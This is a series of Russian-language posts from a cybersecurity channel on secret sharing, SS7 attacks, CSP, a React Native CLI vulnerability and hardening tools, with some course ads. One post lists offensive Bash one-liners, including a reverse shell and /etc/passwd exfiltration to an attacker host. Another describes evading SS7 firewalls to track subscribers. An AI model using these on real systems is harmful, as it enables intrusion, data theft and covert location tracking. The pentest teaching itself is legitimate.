ZeroDay | Кибербезопасность

Shamir’s Secret Sharing: что за тип шифрования? 👋 Приветствую в мире цифровой безопасности! Сегодня разберём технику защиты ключей Shamir’s Secret Sharing (секретное разделение Шамира). ⏺Суть проблемы: Вы храните мастер-ключ, API-токен или приватный ключ шифрования в одном месте (даже в HSM или Vault). Если это место скомпрометировали - всё потеряно. А если просто сломалось или сотрудник уволился с единственной копией, тоже потеряно. Нужно решение, которое устойчиво и к утечке, и к потере. ⏺Как работает Shamir’s Secret Sharing: Секрет математически «разбивается» на N частей (shares), из которых любые K (порог) достаточно, чтобы восстановить оригинал. Меньше K ничего не узнать, даже если собрать все остальные части. Это не просто разделение файла, а криптографическая схема на основе полиномов. Пример: разбиваем мастер-ключ на 6 частей, порог K=3. ➡️ Можно потерять до 3 частей - секрет всё равно восстановится. ➡️ Если атакующий украдёт 2 части - он ничего не получит. ⏺Где это реально используют: Часто в тех же многофакторных кошельках криптовалюты (типа 2-of-3 или 3-of-5) или, например, в enterprise-решениях для key management: мастер-ключ Vault или KMS разбивается между несколькими нодами/сотрудниками, ну и конечно в air-gapped системах: части хранятся на разных носителях в разных локациях. ⏺Плюсы по сравнению с простым бэкапом: • Нет единой точки отказа. • Нет полной копии ключа ни у одного человека/сервера. • Устойчивость к принуждению: даже если заставят отдать свою часть — одной недостаточно. ZeroDay | #шифрование

Хороший, Плохой, Расширенный: SS7 атака с использованием расширенных тэгов 👋 Приветствую в мире цифровой безопасности! Разберём один из более изящных приёмов атак на SS7 - обход защит через кодирование TCAP с использованием расширенных тэгов ASN.1. ⏺Контекст простой и неприятный: большинство современных SS7-атак целятся не в сам протокол целиком, а в логику его обработки. TCAP идеальная цель. Он сложный, гибкий и кодируется через ASN.1 BER, где один и тот же объект можно представить несколькими допустимыми способами. Для атакующего это простор для манёвра, для защитных систем - источник боли. ⏺Исторически всё началось с Global Opcode Encoding, затем появились расширенные Application Context, удлинённые TCAP ID и другие техники. Все они объединены одной идеей: сформировать PDU так, чтобы он был формально валиден по стандарту, но плохо распознавался фильтрами и сигнальными фаерволами. ⏺Новый приём крутится вокруг операции PSI (ProvideSubscriberInfo) в GSM-MAP. Это легитимная команда, которую операторы используют для работы с роумингом и биллингом. Но в руках атакующего PSI - инструмент слежки: запросил - получил местоположение абонента. Ключевое поле здесь IMSI. Именно по нему защита решает, пропускать запрос или блокировать. ⏺В «нормальном мире» IMSI кодируется стандартным контекстным тэгом. Защитные системы знают, где его искать, и проверяют: если IMSI домашний, а запрос пришёл извне - блок. Но BER допускает расширение тэга. И вот тут начинается магия. ⏺Атакующий кодирует IMSI не обычным тэгом, а через механизм extended tag: вместо ожидаемого однобайтового идентификатора используется расширенная форма с дополнительным октетом. Формально всё по стандарту ITU Q.773. Фактически IMSI «прячется» от фильтра, который ищет его в привычном месте. ⏺Результат прям неприятный: сигнальный фаервол не извлекает IMSI, не может применить политику и пропускает PSI. Для сети это выглядит как допустимый роуминговый запрос, а для атакующего - рабочий канал получения чувствительной информации. ⏺Почему это опасно: такие техники не эксплойтят баг в коде, они эксплойтят допущения. Защита предполагает «правильное» кодирование, а атакующий использует альтернативное, но валидное. Это делает атаку устойчивой и сложной для обнаружения. ZeroDay | #атака

Норм вариант защиты? ZeroDay | #мем

🎄 НОВОГОДНЯЯ ЛОТЕРЕЯ CODEBY 🎄 Дорогие друзья! Команда CODEBY поздравляет вас с наступающим Новым годом! Спасибо, что выбираете нас — нам очень приятно видеть, как наши студенты превращаются в специалистов высшего класса. Именно поэтому мы решили сделать вам новогодние подарки! 🎁 📣ОБЪЯВЛЯЕМ ЛОТЕРЕЮ Как участвовать: • Купите любой курс, стартующий в 2026 году • Получите индивидуальный номер участника • Чем больше курсов — тем выше шансы на победу! Период проведения: 🗓26 декабря 2025 — 12 января 2026 ⭐ Розыгрыш в прямом эфире 12 января в 21:00 МСК 🏆 ПРИЗОВОЙ ФОНД 🥇 1 место — iPhone 17 🥈 2 место — Apple Watch 🥉 3 место — AirPods 🎁 4-10 места — подписка HackerLab PRO на 1 месяц Итого: 10 победителей! 🚀Успей принять участие — времени остается все меньше! ➡️ Выбрать курс 🥇 Для связи с менеджером @CodebyAcademyBot Всем желаем удачи! 🚀 Ознакомиться с условиями розыгрыша здесь! #онлайнобучение #курсыиб #розыгрыш #кодебай #cybersecurity

CSP: защита браузера от чужого кода 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу про Content Security Policy - механизм, который помогает браузеру блокировать злонамеренный код ещё до того, как он сможет навредить. ⏺CSP - это набор правил, которые сервер отдаёт браузеру. Правила говорят: «Можно загружать скрипты только с этих доменов, стили только с этих, картинки отсюда, и никаких inline‑скриптов». Пример простого заголовка:

    
        Content-Security-Policy: default-src 'self'; script-src 'self' https://cdn.example.com; style-src 'self' https://fonts.googleapis.com{}
    

Здесь мы разрешаем скрипты только с нашего домена и CDN, стили - с собственного домена и Google Fonts, а всё остальное - блокируем. ⏺Inline-скрипты и eval() - самые частые враги. CSP их блокирует, если явно не разрешено через nonce или hash. ⏺Чуть советов на практике: используйте 'self' и конкретные домены для внешних ресурсов, для inline-скриптов применяйте nonce или hash, разделяйте политики для скриптов, стилей и медиа, и обязательно анализируйте логи CSP, чтобы понять, что реально блокируется. ⏺А типичные ошибки обычно такие: политика слишком лояльная (для всего), забыли nonce - inline-код ломается, не проанализировали сторонние скрипты - возможны обходы. ZeroDay | #безопасность

🚀 Киберразведка, исследования ИБ или сетевая безопасность: что выберете вы? Онлайн-проект о профессиях в кибербезопасности от "Лаборатории Касперского" – это: 🗺 Интерактивное путешествие по вселенной кибербезопасности 🦸‍♂️ Встреча с командой кибергероев 📌 Карточки профессий: что делать, какие инструменты использовать, куда идти дальше 🎓 Тесты для новичков, профи и команд Проект поможет быстро оценить навыки и подскажет идеальное направление для вашего роста в ИБ. После прохождения теста вы получите персональные рекомендации по обучению и развитию, а также узнаете, какие роли и навыки сейчас особенно востребованы в мире кибербезопасности.

5 фишек Bash для автоматизации атак 👋 Приветствую в мире цифровой безопасности! Давай расскажу о 5 фишках Bash, которые заметно ускорят пентест. ⏺Быстрый реверс-шелл (когда есть доступ к командной строке на жертве):

    
        bash -i >& /dev/tcp/АТАКУЮЩИЙ_IP/4444 0>&1{}
    

⏺Массовый скан портов на списке хостов (без nmap, через /dev/tcp):

    
        for h in $(cat hosts.txt); do for p in 80 443 22 445 3389; do timeout 1 bash -c “echo >/dev/tcp/$h/$p” && echo “$h:$p открыт” || true; done; done{}
    

⏺Получение файла с удалённой машины через чистый Bash (file transfer без wget/curl):

    
        exec 5<>/dev/tcp/АТАКУЮЩИЙ_IP/4444; cat $LOCAL_FILE >&5; cat <&5 > $REMOTE_FILE{}
    

➡️Сначала на атакующей машине: nc -lvnp 4444 > file.txt ➡️На жертве: exec 5<>/dev/tcp/АТАКУЮЩИЙ_IP/4444; cat /etc/passwd >&5 ⏺Поиск SUID-файлов на скомпрометированной машине (для провилажа эскалейшн):

    
        find / -perm -u=s -type f 2>/dev/null{}
    

Быстро находит потенциальные векторы эскалации (например, sudo, ping с SUID). ⏺Массовый сбор базовой инфы о системе и сети (post-exploitation enumeration):

    
        for h in $(cat hosts.txt); do echo “=== $h ===”; ssh user@$h “hostname; whoami; ip a | grep inet; cat /etc/os-release; sudo -l”; done{}
    

Если есть SSH-доступ - одной командой собираем ключевую информацию со всех машин. ZeroDay | #bash

privacy.sexy: автоматизируем приватность и хардинг ОС 👋 Приветствую в мире цифровой безопасности! Поговорим о еще одном инструменте безопасности. ⏺privacy.sexy - инструмент с сотнями скриптов для Windows, macOS и Linux, направленных на снижение утечек данных и усиление базовой безопасности системы. Без бинарных агентов и скрытых действий, здесь наоборот открытый код и явные изменения. ⏺Но важно: инструмент не чинит всё автоматом. Он заставляет осознанно выбирать, какие механизмы включать. Каждый пункт - отдельный сценарий с чётким эффектом и понятным побочным влиянием. ⏺Использование сводится к применению выбранной конфигурации. После апдейта ОС или смены устройства её можно воспроизвести за минуты. Пример запуска desktop-версии:

    
        # macOS / Linux
./privacy.sexy{}
    

⏺В отличие от обычных «оптимизаторов», privacy.sexy не прячет последствия. Скрипты можно читать, редактировать и дополнять под собственные требования, от персонального ноутбука до корпоративного образа. ⏺Отдельный плюс - обратимость. Большинство твиков можно откатить тем же механизмом, что делает инструмент безопасным для повседневной работы, а не только для лабораторий. ⏺Структура репозитория подчёркивает модульность подхода:

    
        scripts/
  ├── os/
  ├── privacy/
  ├── security/
src/
tests/{}
    

ZeroDay | #Инструмент

Positive Technologies выкатили релиз MaxPatrol EDR 9.0. Всем обновившимся откроют бесплатный доступ к новому антивирусному продукту Компания снова прокачала свой продукт для защиты конечных устройств. Главные фишки предновогоднего релиза: ✅Самозащита — встроенный драйвер защищает EDR-агенты на устройствах с Windows от несанкционированной остановки и удаления. ✅Свои IoC — можно загружать собственные индикаторы компрометации или использовать готовые от ФСТЭК и других регуляторов. ✅Цифровые улики — новый модуль собирает больше 40 категорий данных с устройств для расследования инцидентов. ✅Автономность — теперь не нужна интеграция с MaxPatrol SIEM, все события хранятся в собственной БД продукта. Больше подробностей на сайте После перехода на версию 9.0 пользователи MaxPatrol EDR смогут 6 месяцев бесплатно пользоваться новым антивирусным продуктом MaxPatrol EPP. Вендор заявляет, что такой тандем поможет защититься сразу и от массовых угроз, и от сложных атак.

Ваш сайт вам больше не принадлежит: CVE-2025-11953 и атака через React Native CLI 👋 Приветствую в мире цифровой безопасности! Разберем кейс, где «безобидная» утилита для разработки внезапно открывает дверь в систему. ⏺React Native Community CLI используют как вспомогательный инструмент - запустить Metro, посмотреть логи, собрать билд. Но именно в его серверной части (@react-native-community/cli-server-api) и нашли CVE-2025-11953 с CVSS 9.8. ⏺Уязвимость позволяла отправить неаутентифицированный POST-запрос и добиться выполнения произвольных команд. Никакой магии: dev-сервер принимал входящие данные и передавал их в системный вызов. ⏺Критичный момент - окружение. Metro часто крутится в Docker, CI или на удалённой машине для команды. Если порт доступен извне, «локальная» проблема мгновенно становится удалённым RCE. ⏺JFrog подтвердили эксплуатацию: на Windows атакующий получал полный контроль над параметрами команд, на Linux и macOS - устойчивое выполнение кода. Дальше всё стандартно: кража токенов, подмена сборок, доступ к облачным ключам. ⏺Масштаб усиливает риск: миллионы установок CLI означают, что один баг бьёт сразу по экосистеме, а не по одному проекту. ⏺Патч вышел в версии 20.0.0, но главный вывод глубже апдейта. Любой dev-инструмент с HTTP-сервером - это потенциальная точка входа, даже если он «только для разработки». ⏺Dev-среда давно часть продакшн-периметра. И атакующие это понимают лучше многих команд. ZeroDay | #история